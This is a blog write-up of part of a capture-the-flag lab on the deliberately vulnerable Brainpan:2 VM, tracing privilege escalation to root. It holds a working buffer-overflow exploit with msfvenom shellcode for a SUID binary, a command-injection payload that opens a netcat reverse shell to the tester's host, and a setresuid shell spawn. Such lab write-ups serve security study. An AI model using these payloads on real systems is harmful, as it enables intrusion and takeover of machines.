PentestsPL

PANhandler from /dev/null

PENTEST LAB - BRAINPAN: 2 (part II: looking for root)

This is part II of the “Pentest Lab” in which I’m presenting my fight with “Brainpan:2”. In the first part I’ve gained access to the machine. Now it’s time to gain root. I’ve logged as user “anansi” using reverse shell spawned from custom app running on port 9999. Let’s have a look inside home folder

!!!SPOILER ALERT!!!

If you want to finish this challenge alone stop reading here.

anansi@brainpan2:/opt$ cd /home cd /home anansi@brainpan2:/home$ ls -la ls -la total 20 drwxr-xr-x  5 root    root    4096 Nov  4  2013 . drwxr-xr-x 22 root    root    4096 Nov  5  2013 .. drwx------  2 anansi  anansi  4096 Jun  6 07:03 anansi drwx------  4 puck    puck    4096 Nov  5  2013 puck drwxr-xr-x  3 reynard reynard 4096 Nov  7  2013 reynard anansi@brainpan2:/home$ cd anansi cd anansi anansi@brainpan2:~$ ls -la ls -la total 28 drwx------ 2 anansi anansi 4096 Jun  6 07:03 . drwxr-xr-x 5 root   root   4096 Nov  4  2013 .. -rw------- 1 anansi anansi    0 Nov  5  2013 .bash_history -rw-r--r-- 1 anansi anansi  220 Nov  4  2013 .bash_logout -rw-r--r-- 1 anansi anansi 3392 Nov  4  2013 .bashrc -rw-r--r-- 1 anansi anansi  675 Nov  4  2013 .profile -rw-r--r-- 1 anansi anansi   22 Jun  6 07:03 somefilename -rwxr-xr-x 1 anansi anansi  114 Nov  4  2013 startbrainpan.sh anansi@brainpan2:~$ cd .. cd .. anansi@brainpan2:/home$ ls ls anansi  puck  reynard anansi@brainpan2:/home$ cd reynard cd reynard anansi@brainpan2:/home/reynard$ ls -la ls -la total 44 drwxr-xr-x 3 reynard reynard 4096 Nov  7  2013 . drwxr-xr-x 5 root    root    4096 Nov  4  2013 .. -rw------- 1 reynard reynard    0 Nov  7  2013 .bash_history -rw-r--r-- 1 reynard reynard  220 Nov  4  2013 .bash_logout -rw-r--r-- 1 reynard reynard 3392 Nov  4  2013 .bashrc -rwsr-xr-x 1 root    root    8999 Nov  6  2013 msg_root -rw-r--r-- 1 reynard reynard  675 Nov  4  2013 .profile -rw-r--r-- 1 reynard reynard  154 Nov  5  2013 readme.txt -rwxr-xr-x 1 reynard reynard  137 Nov  4  2013 startweb.sh drwxr-xr-x 3 reynard reynard 4096 Nov  4  2013 web anansi@brainpan2:/home/reynard$ ./msg_root ./msg_root usage: msg_root username message

Nothing interesting in anansi folder, but I could access reynard home folder and found there an interesting app. I’ve started SimpleHTTPServer inside his folder and downloaded a binary.

anansi@brainpan2:/home/reynard$ python -m SimpleHTTPServer 12000 python -m SimpleHTTPServer 12000 Serving HTTP on 0.0.0.0 port 12000 ... 192.168.57.1 - - [06/Jun/2014 07:33:09] "GET / HTTP/1.1" 200 - 192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found 192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 - 192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found 192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 - 192.168.57.1 - - [06/Jun/2014 07:33:11] "GET /msg_root HTTP/1.1" 200 -

At this point I knew that there’s probably a some way to exploit that binary. Why? That’s why:

anansi@brainpan2:/home/reynard$ ./msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa                    Segmentation fault anansi@brainpan2:/home/reynard$

Let’s make some reverse engineering.

$ gdb msg_root GNU gdb (GDB) 7.4.1-debian Copyright (C) 2012 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.  Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>... Reading symbols from /home/..../msg_root...done. (gdb) r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Starting program: /home/..../brainpan2/msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? () (gdb) bt #0  0x61616161 in ?? () #1  0x0804872e in get_name (u=0xffffd5c3 'a' <repeats 108 times>, m=0xffffd630 'a' <repeats 87 times>) at msg_root.c:26 #2  0x0804877b in main (argc=3, argv=0xffffd434) at msg_root.c:35

I’ve checked file in hte and found some functions inside:

  • save_msg
  • get_name
  • main

When app is executed it goes: main -> get_name -> save_msg. Looking on backtrace from crash I noticed address 0x0804872e which is inside method get_name. Disassembling this function gives code like below:

Dump of assembler code for function get_name:    0x080486a1 <+0>:    push   %ebp    0x080486a2 <+1>:    mov    %esp,%ebp    0x080486a4 <+3>:    sub    $0x20,%esp    0x080486a7 <+6>:    movl   $0x804863c,-0x4(%ebp)    0x080486ae <+13>:    mov    0x8(%ebp),%eax    0x080486b1 <+16>:    mov    %eax,(%esp)    0x080486b4 <+19>:    call   0x8048500 <strlen@plt>    0x080486b9 <+24>:    cmp    $0x11,%eax    0x080486bc <+27>:    ja     0x80486d2 <get_name+49>    0x080486be <+29>:    mov    0x8(%ebp),%eax    0x080486c1 <+32>:    mov    %eax,0x4(%esp)    0x080486c5 <+36>:    lea    -0x12(%ebp),%eax    0x080486c8 <+39>:    mov    %eax,(%esp)    0x080486cb <+42>:    call   0x80484b0 <strcpy@plt>    0x080486d0 <+47>:    jmp    0x80486ec <get_name+75>    0x080486d2 <+49>:    movl   $0x12,0x8(%esp)    0x080486da <+57>:    mov    0x8(%ebp),%eax    0x080486dd <+60>:    mov    %eax,0x4(%esp)    0x080486e1 <+64>:    lea    -0x12(%ebp),%eax    0x080486e4 <+67>:    mov    %eax,(%esp)    0x080486e7 <+70>:    call   0x8048540 <strncpy@plt>    0x080486ec <+75>:    movl   $0x7d0,(%esp)    0x080486f3 <+82>:    call   0x80484c0 <malloc@plt>    0x080486f8 <+87>:    mov    %eax,-0x8(%ebp)    0x080486fb <+90>:    mov    0xc(%ebp),%eax    0x080486fe <+93>:    mov    %eax,(%esp)    0x08048701 <+96>:    call   0x8048500 <strlen@plt>    0x08048706 <+101>:    mov    %eax,0x8(%esp)    0x0804870a <+105>:    mov    0xc(%ebp),%eax    0x0804870d <+108>:    mov    %eax,0x4(%esp)    0x08048711 <+112>:    mov    -0x8(%ebp),%eax    0x08048714 <+115>:    mov    %eax,(%esp)    0x08048717 <+118>:    call   0x8048540 <strncpy@plt>    0x0804871c <+123>:    mov    -0x8(%ebp),%eax    0x0804871f <+126>:    mov    %eax,0x4(%esp)    0x08048723 <+130>:    lea    -0x12(%ebp),%eax    0x08048726 <+133>:    mov    %eax,(%esp) => 0x08048729 <+136>:    mov    -0x4(%ebp),%eax    0x0804872c <+139>:    call   *%eax    0x0804872e <+141>:    mov    -0x8(%ebp),%eax    0x08048731 <+144>:    mov    %eax,(%esp)    0x08048734 <+147>:    call   0x8048490 <free@plt>    0x08048739 <+152>:    leave    0x0804873a <+153>:    ret   End of assembler dump.

The arrow points instruction that moves content of the address 4bytes before ebp and moves it to eax and then jumps to it. Here’s how this looks when user provides valid input:

Breakpoint 2, 0x08048729 in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26 26    in msg_root.c (gdb) i r ebp eax ebp            0xffffd3f8    0xffffd3f8 eax            0xffffd3e6    -11290 (gdb) x $ebp-4 0xffffd3f4:    0x0804863c (gdb) x/12xw $esp 0xffffd3d8:    0xffffd3e6    0x0804a008    0x00000012    0x6161d4b4 0xffffd3e8:    0x61616161    0xffff0061    0x0804a008    0x0804863c 0xffffd3f8:    0xffffd408    0x0804877b    0xffffd644    0xffffd64c

You can notice few 61 which corresponds to  “aaaaaaa”. Command x $ebp-4 shows what will be moved to eax, address 0x0804863c is where save_msg method starts. Checking address 0x0804a008 which is ebp-8 shows that this is a memory where second argument is copied (in my case it’s a few b’s which are 0x62 below):

(gdb) x/8xw 0x0804a008 0x804a008:    0x62626262    0x62626262    0x62626262    0x62626262 0x804a018:    0x00006262    0x00000000    0x00000000    0x00000000 Moving further: (gdb) s Breakpoint 3, 0x0804872c in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26 26    in msg_root.c (gdb) i r ebp eax ebp            0xffffd3f8    0xffffd3f8 eax            0x804863c    134514236

you can see eax is now pointing to save_msg. Providing long first argument one can overwrite memory which will be copied to eax and thus crash the app, as shown below:

Breakpoint 2, 0x08048729 in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26 26    in msg_root.c (gdb) x/16xw $esp 0xffffd3a8:    0xffffd3b6    0x0804a008    0x00000012    0x6161d484 0xffffd3b8:    0x61616161    0x61616161    0x0804a008    0x61616161 0xffffd3c8:    0xffffd3d8    0x0804877b    0xffffd60c    0xffffd64c 0xffffd3d8:    0xffffd458    0xf7e6ee46    0x00000003    0xffffd484 (gdb) i r ebp eax ebp            0xffffd3c8    0xffffd3c8 eax            0xffffd3b6    -11338 (gdb) s Breakpoint 3, 0x0804872c in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26 26    in msg_root.c (gdb) i r ebp eax ebp            0xffffd3c8    0xffffd3c8 eax            0x61616161    1633771873 (gdb) s Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? ()

Armed with that knowledge I started exploitation phase. My idea was simple. Provide address to the shellcode in first argument while writing the shellcode in the second one. So the first argument can only be the 0x0804a008 repeated few times which gives me: perl -e 'print "\x04\x08\x08\xa0"x8;'

For the second argument I’ve needed shellcode. You can find one online or use msfvenom:

$ msfvenom -p linux/x86/exec CMD="/bin/sh" -b "x00" -f py No platform was selected, choosing Msf::Module::Platform::Linux from the payload No Arch selected, selecting Arch: x86 from the payload Found 22 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 70 (iteration=0) buf =  "" buf += "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31" buf += "\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2" buf += "\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01" buf += "\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70" buf += "\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d" buf += "\x3d\xd4\x0e\x4c\x41"

Here’s the second argument:

perl -e 'print "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'

And command in action:

anansi@brainpan2:/home/reynard$ ./msg_root `perl -e 'print "\x04\x08\x08\xa0"x8;'` `perl -e 'print "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'` <x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`     $ id id uid=1000(anansi) gid=1000(anansi) euid=104(root) groups=106(root),50(staff),1000(anansi) $ cd /root cd /root $ ls -la ls -la total 28 drwx------  3 root  root  4096 Nov  5  2013 . drwxr-xr-x 22 root  root  4096 Nov  5  2013 .. drwx------  2 root  root  4096 Nov  4  2013 .aptitude -rw-------  1 root  root     0 Nov  5  2013 .bash_history -rw-r--r--  1 root  root   589 Nov  5  2013 .bashrc -rw-r--r--  1 root  root   159 Nov  5  2013 .profile -rw-------  1 root  root   461 Nov  5  2013 flag.txt -rw-------  1 root  root   245 Nov  5  2013 whatif.txt $ cat flag.txt cat flag.txt cat: flag.txt: Permission denied $ cat whatif.txt cat whatif.txt        WHAT IF I TOLD YOU               ___             /     \            | ______\           (, \_/ \_/            |   ._. |            \   --- /            /`-.__.'       .---'`-.___|\___      /                `.        YOU ARE NOT ROOT? $ ls -n ls -n total 8 -rw------- 1   0   0 461 Nov  5  2013 flag.txt -rw------- 1 104 106 245 Nov  5  2013 whatif.txt

I must say, the trick with the root account is a nice one. There are two accounts one named “root” and the other one “root “ (with a space on the end). The second one is the real root here. There’s still a long road before me… I looked for SUID/SGID execs:

$ find / -perm -g=s -o -perm -u=s -type f 2>/dev/null find / -perm -g=s -o -perm -u=s -type f 2>/dev/null ... /opt/old/brainpan-1.8/brainpan-1.8.exe ... This one in opt folder caught my attention. I found some files in that folder: $ ls -la ls -la total 36 drwxrwxr-x 2 root  staff  4096 Nov  5  2013 . drwx------ 3 root  root   4096 Nov  4  2013 .. -rwsr-xr-x 1 puck  puck  17734 Nov  4  2013 brainpan-1.8.exe -rw-r--r-- 1 puck  puck   1227 Nov  5  2013 brainpan.7 -rw-rw-rw- 1 puck  staff    27 Nov  5  2013 brainpan.cfg $ cat brainpan.cfg cat brainpan.cfg port=9333 ipaddr=127.0.0.1 Let's modify the cfg to run app on all addresses: $ echo "port=9333" > brainpan.cfg echo "port=9333" > brainpan.cfg $ echo "ipaddr=0.0.0.0" >> brainpan.cfg echo "ipaddr=0.0.0.0" >> brainpan.cfg $ cat brainpan.cfg cat brainpan.cfg port=9333 ipaddr=0.0.0.0

I’ve started the app and connected from my machine:

$ nc 192.168.57.10 9444 _|                            _|                                        _|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  _|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _| _|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _| _|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|                                             _|                                                                      _| [______________________ WELCOME TO BRAINPAN 1.8________________________]                              LOGIN AS GUEST                                                       >> GUEST                           ACCESS GRANTED                              *  *  *  *                                    THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED.      TYPE "TELL ME MORE" FOR A LIST OF COMMANDS.                               *  *  *  *                                                          >> VIEW     ENTER FILE TO DOWNLOAD: a; nc -e /bin/sh 192.168.57.1 5600
$ nc -l -p 5600 -v nc: listening on :: 5600 ... nc: listening on 0.0.0.0 5600 ... nc: connect to 192.168.57.1 5600 from 192.168.57.10 (192.168.57.10) 41003 [41003] id uid=1000(anansi) gid=1000(anansi) euid=1001(puck) groups=1001(puck),50(staff),1000(anansi)

We are almost the user “puck”. There are few ways to elevate our id from 1000 to 1001. I’ve show one in this post and here’s it in action:

python -c 'import os,pty;os.setresuid(1001,1001,1001);pty.spawn("/bin/bash");' puck@brainpan2:/opt/old/brainpan-1.8$ whoami whoami puck puck@brainpan2:/opt/old/brainpan-1.8$ id id uid=1001(puck) gid=1000(anansi) groups=1001(puck),50(staff),1000(anansi) puck@brainpan2:/opt/old/brainpan-1.8$

Let’s check puck’s folder:

puck@brainpan2:/opt/old/brainpan-1.8$ cd /home cd /home puck@brainpan2:/home$ cd puck cd puck puck@brainpan2:/home/puck$ ls -la ls -la total 28 drwx------ 4 puck  puck  4096 Nov  5  2013 . drwxr-xr-x 5 root  root  4096 Nov  4  2013 .. drwxr-xr-x 3 puck  puck  4096 Nov  5  2013 .backup -rw------- 1 puck  puck     0 Nov  5  2013 .bash_history -rw-r--r-- 1 puck  puck   220 Nov  4  2013 .bash_logout -rw-r--r-- 1 puck  puck  3392 Nov  4  2013 .bashrc -rw-r--r-- 1 puck  puck   675 Nov  4  2013 .profile drwx------ 2 puck  puck  4096 Nov  5  2013 .ssh

Looks clean, backup folder looks suspicious. I’ve checked it:

puck@brainpan2:/home/puck$ cd .backup cd .backup puck@brainpan2:/home/puck/.backup$ ls -la ls -la total 28 drwxr-xr-x 3 puck puck 4096 Nov  5  2013 . drwx------ 4 puck puck 4096 Nov  5  2013 .. -rw------- 1 puck puck  395 Nov  5  2013 .bash_history -rw-r--r-- 1 puck puck  220 Nov  4  2013 .bash_logout -rw-r--r-- 1 puck puck 3392 Nov  4  2013 .bashrc -rw-r--r-- 1 puck puck  675 Nov  4  2013 .profile drwx------ 2 puck puck 4096 Nov  4  2013 .ssh

Not empty bash_history? That’s strange:

puck@brainpan2:/home/puck/.backup$ cat .bash_history cat .bash_history cd /usr/local/bin ls -l ./msg_root "comment on the latest version please" cd /opt/brainpan/ ps aux vi brainpan-1.8.c cd ../archive netstat -antp netstat -antp | grep 9888 cd .. ls cd old ls cd brainpan-1.8 vi brainpan-1.8.c ssh -l "root " brainpan2 vi brainpan.7 man ./brainpan.7 ls htop top ls -latr cat .bash_history ls mkdir .backup mv .ssh .bash* .backup cd .backup/ ls clear ls -latr exit puck@brainpan2:/home/puck/.backup$

So user puck can login on the root through ssh. After looking through folders I’ve done this:

puck@brainpan2:/home/puck$ mv .ssh .ssh-old mv .ssh .ssh-old puck@brainpan2:/home/puck$ cp -rp .backup/.ssh . cp -rp .backup/.ssh . puck@brainpan2:/home/puck$ ls -la ls -la total 32 drwx------ 5 puck  puck   4096 Jun  6 10:31 . drwxr-xr-x 5 root  root   4096 Nov  4  2013 .. drwxr-xr-x 3 puck  puck   4096 Nov  5  2013 .backup -rw------- 1 puck  puck      0 Nov  5  2013 .bash_history -rw-r--r-- 1 puck  puck    220 Nov  4  2013 .bash_logout -rw-r--r-- 1 puck  puck   3392 Nov  4  2013 .bashrc -rw-r--r-- 1 puck  puck    675 Nov  4  2013 .profile drwx------ 2 puck  anansi 4096 Nov  4  2013 .ssh drwx------ 2 puck  puck   4096 Nov  5  2013 .ssh-old puck@brainpan2:/home/puck$ ssh -l "root " brainpan2 ssh -l "root " brainpan2 ssh: connect to host brainpan2 port 22: Connection refused

Either ssh is not running or it’s running on different port.

puck@brainpan2:/home/puck$ cat /etc/ssh/sshd_config cat /etc/ssh/sshd_config # Package generated configuration file # See the sshd_config(5) manpage for details # What ports, IPs and protocols we listen for Port 2222 ...

Got ya!

puck@brainpan2:/home/puck$ ssh -l "root " brainpan2 -p 2222 ssh -l "root " brainpan2 -p 2222 The authenticity of host '[brainpan2]:2222 ([127.0.1.1]:2222)' can't be established. ECDSA key fingerprint is 0a:15:1c:1c:25:b0:fe:54:8a:35:45:e5:b8:02:97:1a. Are you sure you want to continue connecting (yes/no)? yes yes Warning: Permanently added '[brainpan2]:2222' (ECDSA) to the list of known hosts. Linux brainpan2 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Nov  7 11:00:06 2013 root @brainpan2:~# cat /root/flag.txt cat /root/flag.txt                           !!! CONGRATULATIONS !!!                  You've completed the Brainpan 2 challenge!                  Or have you...?                  Yes, you have! Pat yourself on the back. :-)                  Questions, comments, suggestions for new VM                  challenges? Let me know!                  Twitter: <redacted>                  Email  : <redacted>                  Web    : http://www.techorganic.com root @brainpan2:~#

That’s all! I must say I’ve really enjoyed this one. There were a few times when I wanted to grab my laptop and teach it how to fly but beating these moments gave me a lot of satisfaction and new experiences. See you soon!

Written on June 11, 2014